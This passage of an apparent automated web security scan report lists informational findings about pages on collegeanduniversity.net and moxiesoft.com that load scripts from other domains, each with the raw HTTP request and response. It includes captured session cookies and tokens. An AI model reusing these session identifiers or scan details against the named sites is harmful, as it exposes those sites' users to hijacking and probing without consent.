Host:   http://www.collegeanduniversity.net
Path:   /herald/

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): www.google-analytics.com, res.levexis.com

Request

GET /herald/ HTTP/1.1
Host: www.collegeanduniversity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:22 GMT
Server: Apache
Set-Cookie: CFID=23963338;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
Set-Cookie: CFTOKEN=f88699cd696e59f-D0093CEE-19B9-F336-D82E00A07F24E43B;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
Set-Cookie: JSESSIONID=2230a73fafc47a1826775e4a1668b3f46594;path=/
Set-Cookie: CUNET.SHOWDEBUG=0;path=/
Set-Cookie: CU2005FRONTAPPKEY.SHOWDEBUG=0;path=/
Set-Cookie: CID=175;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
P3P: CP='ADMa DEVa OUR IND DSP NON COR'
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28386

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Find Online College Degrees - Top Online Universities at Collegeanduniversity.net</title>
<meta name="Descriptio
...[SNIP]...
<!-- Google Analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://res.levexis.com/clientfiles/tmap/cunet.js"></script><script type="text/javascript" src="http://res.levexis.com/js/tman.js"></script>
...[SNIP]...

18.815. http://www.moxiesoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): s3.amazonaws.com

Request

GET / HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><Title>M
...[SNIP]...
<!--End VisitorTrack Code-->

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/0790.js"></script>
...[SNIP]...

18.816. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /solutions/cust-engagement-spaces.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): www.googleadservices.com

Request

GET /solutions/cust-engagement-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.817. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /solutions/emp-engagement-spaces.aspx

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): ajax.googleapis.com, www.googleadservices.com

Request

GET /solutions/emp-engagement-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31308


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<link type="text/css" media="screen" rel="stylesheet" href="/tal_products/spaces-assets/colorbox/colorbox.css" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.818. http://www.moxiesoft.com/tal_about/contact.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/contact.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): ajax.googleapis.com

Request

GET /tal_about/contact.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<![endif]-->
   
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

18.819. http://www.moxiesoft.com/tal_news/press_release.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/press_release.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): static.addtoany.com

Request

GET /tal_news/press_release.aspx?id=3530 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"><!--
//-->
...[SNIP]...

18.820. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/webinars_recorded.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): ajax.googleapis.com

Request

GET /tal_news/webinars_recorded.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<link type="text/css" media="screen" rel="stylesheet" href="/tal_products/spaces-assets/colorbox/colorbox.css" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

18.821. http://www.moxiesoft.com/tal_products/answer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/answer.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): ngencim.ngenera.com

Request

GET /tal_products/answer.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.822. http://www.moxiesoft.com/tal_products/chat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat.aspx

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): ngencim.ngenera.com, www.googleadservices.com

Request

GET /tal_products/chat.aspx?ac=PPC.B.live%20chat HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=elqucae4pira41q1xauy2i45; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; expires=Sat, 28-Jan-2012 13:58:55 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.823. http://www.moxiesoft.com/tal_products/cobrowse.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/cobrowse.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): www.googleadservices.com

Request

GET /tal_products/cobrowse.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.824. http://www.moxiesoft.com/tal_products/customer-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/customer-spaces.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): www.googleadservices.com

Request

GET /tal_products/customer-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40034


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.825. http://www.moxiesoft.com/tal_products/email.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/email.aspx

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): ngencim.ngenera.com, www.googleadservices.com

Request

GET /tal_products/email.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.826. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/employee-spaces.aspx

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): ajax.googleapis.com, www.googleadservices.com

Request

GET /tal_products/employee-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<link type="text/css" media="screen" rel="stylesheet" href="spaces-assets/colorbox/colorbox.css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.827. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/knowledgebase.aspx

Issue detail

The response dynamically includes scripts from the following other domains (see the response excerpt below): www.googleadservices.com, ngencim.ngenera.com

Request

GET /tal_products/knowledgebase.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"><!--

//-->
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.828. http://www.moxiesoft.com/tal_products/phone.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/phone.aspx

Issue detail

The response dynamically includes a script from another domain (see the response excerpt below): ngencim.ngenera.com

Request

GET /tal_products/phone.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.829. http://www.moxiesoft.com/tal_products/proactive_chat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/proactive_chat.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tal_products/proactive_chat.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.830. http://www.moxiesoft.com/tal_products/request_demo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/request_demo.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tal_products/request_demo.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<!--End VisitorTrack Code-->
   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.831. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

Summary

